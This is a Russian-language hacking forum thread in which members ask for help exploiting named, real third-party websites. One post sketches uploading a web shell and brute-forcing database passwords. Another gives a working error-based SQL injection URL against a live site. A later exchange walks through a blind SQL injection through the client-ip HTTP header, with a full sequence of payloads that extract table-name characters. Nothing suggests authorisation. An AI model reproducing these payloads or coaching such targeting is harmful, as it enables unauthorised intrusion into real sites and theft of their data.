Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    476
    Likes Received:
    190
    Reputations:
    221
    эм... зайти под админом и повысить свои права;залить шелл, найти конфиг и отредактировать бд; если открыта бд mysql сбрутить пасс, найти пхпмайадмин и опять же повысить свои права

    З.Ы. какой вопрос такой ответ
     
    1 person likes this.
  2. alerondel

    alerondel Member

    Joined:
    20 Apr 2011
    Messages:
    165
    Likes Received:
    9
    Reputations:
    6
    Ну в принципе я об этом тоже думал,логин и пасс от мускла у меня есть,только не расшифровывается)
    Думал есть какие нить варианты как в таблице бд поменять значение.
     
  3. 0x002

    0x002 New Member

    Joined:
    30 May 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Помогите уважаемые гуру.
    и так вот сайтик:
    http://rswow.ru/page.php?p[]=rules
    Вылазит такая штука
    Подскажите как то заюзать данную штуку.

    Заранее спасибо.
     
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    mysql_real_escape_string() принимает параметр типа стринг, о чем и говорит имя фунцкии, а ты передаешь массив, вот и ругается..
     
    _________________________
    1 person likes this.
  5. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Например, так:

    http://wow.war-top.ru/index.php?do=sitedetails&id=74'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+(select+1+union+select+2+union+select+3)x+group+by+2+limit+1)a)+--+
     
    #16885 FlaktW, 31 May 2011
    Last edited: 31 May 2011
  6. 0x002

    0x002 New Member

    Joined:
    30 May 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Я понял что тип стринг
     
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    и что?

    ты же не будешь проверить на SQL injection через подставку массива вместо стринга

    тебе выше показали запрос
     
    _________________________
    #16887 Konqi, 31 May 2011
    Last edited: 1 Jun 2011
  8. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,508
    Likes Received:
    389
    Reputations:
    101
    Раскрытие пути, не более того
     
  9. 0x002

    0x002 New Member

    Joined:
    30 May 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Прошу помощи
    вот http://wow.bridge.net.ua/index.php?n=server&sub=arena&realm=-1
     
  10. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    Где ты там увидел уязвимость?
     
    _________________________
  11. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,055
    Likes Received:
    615
    Reputations:
    690
    0x002 читай маны по скуль инъекциям =\
    а то всю жизнь тебе кто то будет раскручивать недоскули =\
     
    _________________________
  12. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Что-нибудь было придумано для решения SQL-инжекций в таких запросах?

    UNION SELECT использовать соответсвенно не дает (Incorrect usage of UNION and ORDER BY).
     
  13. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    405
    Reputations:
    196
    http://forum.antichat.ru/showthread.php?t=56446
     
    1 person likes this.
  14. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    http://forum.antichat.ru/showpost.php?p=535989&postcount=4

    >24.12.2007, 20:40

    Вот я и спрашиваю, а изменилось ли что-нибудь?
     
  15. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    вот ссылка
    в header вписывая client-ip: 1' выходит скуля
    Но при раскручивании ничего не выявляет и не показывает!
    Помогите плз!
     
  16. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    У меня ничего не выходит. Напиши HTTP-запрос и ответ, в котором ты нашел уязвимость.

    Раскрытие пути - http://ttic.ru/modules/counter/mod.php
     
  17. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    Code:
    Host: ttic.ru
    User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 115
    DNT: 1
    Cookie: PHPSESSID=b6304a7231ca8359ec09f27330a48932
    Connection: keep-alive
    Cache-Control: max-age=0
    client-ip: 1'
    через дополнение mozilla live http replay
     
  18. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    Очень интересная инъекция. Один из вариантов решения:

    client-ip: -1' union select 1,2,3 from information_schema.tables where '1'='1 - true ("You have been banned")
    client-ip: -1' union select 1,2,3 from information_schema.tables where '1'='2 - false (страница без изменений)
     
  19. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    вот и я о том же,этот запрос я тоже пробовал,что меня и огорчило!
     
  20. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    Тут нечему огорчаться. Пиши скрипт и выводи все, что хочешь =)

    client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>128 and '1'='1 нет
    client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>64 and '1'='1 да
    client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>96 and '1'='1 нет
    client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>80 and '1'='1 да
    client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>88 and '1'='1 нет
    client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>84 and '1'='1 да
    client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>86 and '1'='1 нет
    client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>85 and '1'='1 нет

    Код первого символа - 85
     
Loading...
Thread Status:
Not open for further replies.